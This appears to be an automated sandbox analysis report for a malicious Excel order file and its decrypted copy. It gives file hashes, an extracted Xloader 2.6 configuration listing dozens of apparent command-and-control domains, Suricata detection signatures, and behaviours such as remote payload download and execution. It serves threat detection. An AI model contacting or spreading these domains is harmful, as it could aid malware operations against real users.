General
-
Target
Parapex_New_Order.xlsx
-
Size
162KB
-
Sample
220628-l1mtvaadg6
-
MD5
7d21038675e69d5808547b0b5a09f7e3
-
SHA1
eb04abc7b310d4c07a8f26ddf6f307ca51614735
-
SHA256
fbc610b29f55af9ff443232aa7737c990895c284d265173c8f0e3ef0598a3634
-
SHA512
82212f9581dd904d20d010174db6134dd4afba063384e0e573f0034fc6b2a3cf78b552596518354edb7ed0983df0516bd301c0905d071e9d0eab046d68287997
Static task
static1
Behavioral task
behavioral1
Sample
Parapex_New_Order.xlsx
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
Parapex_New_Order.xlsx
Resource
win10v2004-20220414-en
Behavioral task
behavioral3
Sample
decrypted.xlsx
Resource
win7-20220414-en
Behavioral task
behavioral4
Sample
decrypted.xlsx
Resource
win10v2004-20220414-en
Malware Config
Extracted
xloader
2.6
uajq
pixeldoughnut.com
amadeushosting.com
sitecindustrial.com
orsaigroup.com
jmuse-dev.com
angelobreviario.com
storesafe.xyz
40veryoung.com
65228267.com
xmpanshi.com
luxorscbd.com
saoirsia.com
akwadcom.com
spreast.com
net-empresa12pcs.com
avlaoge1.com
projectmuellerllc.com
hvelv.com
a2bproject.com
myhome-huahin.com
beautzenvibes.com
tzssdaayaqa.top
corporatexxx.com
sc-server-meshing.info
breadandsaltmarket.com
dac-nh.com
middleeastsecuritywatch.com
fox-influ.com
mndhestro.biz
voipverse.xyz
enrollee-healthbenconstest.com
peteinson.com
genevapunkska.com
tjysdxx.com
7t4zllco.com
healthypostureclub.fitness
npto3jzh.com
hd0b3oke2q90gz.xyz
thepeachcommission.com
duniabidan.com
ffmembership-garera.com
landllumber.site
bangimpromptu.com
visionboysnft.com
smonique.com
woomart.store
bathholidayhome.com
oci.fyi
lfla.agency
buymms1.com
uurdrzk.xyz
taliamagee.com
melishe.com
worthmoth.com
hotelnamastenepal.com
talmagart.com
ruomot.com
bitcoinodyssey.com
ezzahfatima.com
massthetics.net
yearningearningwithyoussef.com
winhcatraining.com
baunfn.online
estress.online
researchwhiz.com
Targets
-
-
Target
Parapex_New_Order.xlsx
-
Size
162KB
-
MD5
7d21038675e69d5808547b0b5a09f7e3
-
SHA1
eb04abc7b310d4c07a8f26ddf6f307ca51614735
-
SHA256
fbc610b29f55af9ff443232aa7737c990895c284d265173c8f0e3ef0598a3634
-
SHA512
82212f9581dd904d20d010174db6134dd4afba063384e0e573f0034fc6b2a3cf78b552596518354edb7ed0983df0516bd301c0905d071e9d0eab046d68287997
-
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Xloader Payload
-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Executes dropped EXE
-
Abuses OpenXML format to download file from external location
-
Loads dropped DLL
-
Uses the VBS compiler for execution
-
Suspicious use of SetThreadContext
-
-
-
Target
decrypted
-
Size
156KB
-
MD5
93e9cb066fc35d5134f314fc09d0be29
-
SHA1
58f55fb4a02237c5891de5773c209d16df81703e
-
SHA256
c2ef15d0c8f81c352c930b79bb64fc29f030a78b4b8db56ebf03eb14dd62dbe1
-
SHA512
1eb7309143559d5617ff0336efa1f1b37786be2d2b2711f14aaf09518eb9411b1fbfd638366bdf26f4561e78e7d4c0aa39927493b98b43d0fa28234b391ab89c
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Xloader Payload
-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Executes dropped EXE
-
Abuses OpenXML format to download file from external location
-
Loads dropped DLL
-
Uses the VBS compiler for execution
-
Suspicious use of SetThreadContext
-